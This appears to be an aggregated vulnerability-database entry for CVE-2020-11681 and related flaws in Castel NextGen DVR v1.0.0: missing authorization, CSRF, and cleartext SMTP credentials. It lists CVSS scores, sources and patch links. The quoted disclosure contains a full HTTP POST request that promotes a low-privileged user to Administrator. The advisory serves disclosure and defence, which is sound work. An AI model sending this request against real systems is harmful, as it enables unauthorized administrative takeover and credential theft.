ID

VAR-202006-0044


CVE

CVE-2020-11681


TITLE

Castel NextGen DVR Vulnerability regarding inadequate protection of credentials in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006192

DESCRIPTION

Castel NextGen DVR v1.0.0 stores and displays credentials for the associated SMTP server in cleartext. Low privileged users can exploit this to create an administrator user and obtain the SMTP credentials. Castel NextGen DVR contains an inadequate protection of credentials vulnerability. Information may be obtained or tampered with.

All issues are associated with Castel NextGen DVR v1.0.0 and have been resolved in v1.0.1.

-------------------------------

CVE-2020-11679 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role:

    POST /Administration/Users/Edit/:ID HTTP/1.1
    Host: $RHOST
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: $REVIEWER_COOKIES
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 349

    UserId=:ID&Email=bypass%40test.com
    &FirstName=bypass&LastName=bypass&LDAPUser=false
    &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false
    &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false
    &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false
    &Locked=false

-------------------------------

CVE-2020-11680 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET; however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user.

-------------------------------

CVE-2020-11681 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account, or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised.

-------------------------------

CVE-2020-11682 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>

Original Disclosure
https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

Description
The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed.

AARON BISHOP | Principal Penetration Tester
CISSP, OSCP, OSWE

Trust: 2.25

sources: NVD: CVE-2020-11681 // JVNDB: JVNDB-2020-006192 // CNVD: CNVD-2021-24900 // PACKETSTORM: 157954

IOT TAXONOMY

category: ['IoT'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-24900

AFFECTED PRODUCTS

vendor: castel, model: nextgen dvr, scope: eq, version: 1.0.0

Trust: 2.4

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-11681
value: HIGH

Trust: 1.0

NVD: JVNDB-2020-006192
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-24900
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202006-503
value: HIGH

Trust: 0.6

NVD:
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 2.9
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: JVNDB-2020-006192
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-24900
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

NVD:
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 5.2
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-006192
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681 // CNNVD: CNNVD-202006-503

PROBLEMTYPE DATA

problemtype:CWE-522

Trust: 1.8

sources: JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202006-503

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202006-503

CONFIGURATIONS

sources: NVD: CVE-2020-11681

PATCH

title: Digital Video Recorder (DVR), url: http://castle-cctv.kr/digital-video-recorder-dvr/

Trust: 0.8

title: Patch for Castel NextGen DVR administrator creates vulnerability, url: https://www.cnvd.org.cn/patchinfo/show/255921

Trust: 0.6

title: Castel NextGen DVR Security vulnerabilities, url: http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121160

Trust: 0.6

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // CNNVD: CNNVD-202006-503

EXTERNAL IDS

db: NVD, id: CVE-2020-11681

Trust: 3.1

db: PACKETSTORM, id: 157954

Trust: 3.1

db: JVNDB, id: JVNDB-2020-006192

Trust: 0.8

db: CNVD, id: CNVD-2021-24900

Trust: 0.6

db: CNNVD, id: CNNVD-202006-503

Trust: 0.6

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // PACKETSTORM: 157954 // NVD: CVE-2020-11681 // CNNVD: CNNVD-202006-503

REFERENCES

url:http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html

Trust: 3.6

url:https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Trust: 1.7

url:http://seclists.org/fulldisclosure/2020/jun/8

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2020-11681

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2020-11680

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681

Trust: 0.1

url:https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-11679

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-11682

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682

Trust: 0.1

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // PACKETSTORM: 157954 // NVD: CVE-2020-11681 // CNNVD: CNNVD-202006-503

CREDITS

Aaron Bishop

Trust: 0.7

sources: PACKETSTORM: 157954 // CNNVD: CNNVD-202006-503

SOURCES

db: CNVD, id: CNVD-2021-24900
db: JVNDB, id: JVNDB-2020-006192
db: PACKETSTORM, id: 157954
db: NVD, id: CVE-2020-11681
db: CNNVD, id: CNNVD-202006-503

LAST UPDATE DATE

2023-12-18T12:27:28.607000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2021-24900, date: 2021-04-04T00:00:00
db: JVNDB, id: JVNDB-2020-006192, date: 2020-07-02T00:00:00
db: NVD, id: CVE-2020-11681, date: 2020-06-10T17:31:33.467
db: CNNVD, id: CNNVD-202006-503, date: 2021-01-04T00:00:00

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2021-24900, date: 2021-04-04T00:00:00
db: JVNDB, id: JVNDB-2020-006192, date: 2020-07-02T00:00:00
db: PACKETSTORM, id: 157954, date: 2020-06-05T18:19:24
db: NVD, id: CVE-2020-11681, date: 2020-06-04T19:15:12.850
db: CNNVD, id: CNNVD-202006-503, date: 2020-06-04T00:00:00